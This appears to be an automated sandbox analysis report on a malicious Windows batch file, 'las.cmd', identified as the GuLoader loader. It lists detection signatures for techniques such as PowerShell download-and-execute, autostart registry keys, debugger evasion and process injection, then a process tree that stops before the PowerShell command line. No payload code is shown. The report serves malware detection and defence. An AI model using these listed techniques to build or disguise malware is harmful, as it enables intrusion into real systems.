Windows
Analysis Report
las.cmd
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Classes Autorun Keys Modification
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7544 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
powershell.exe (PID: 7596 cmdline: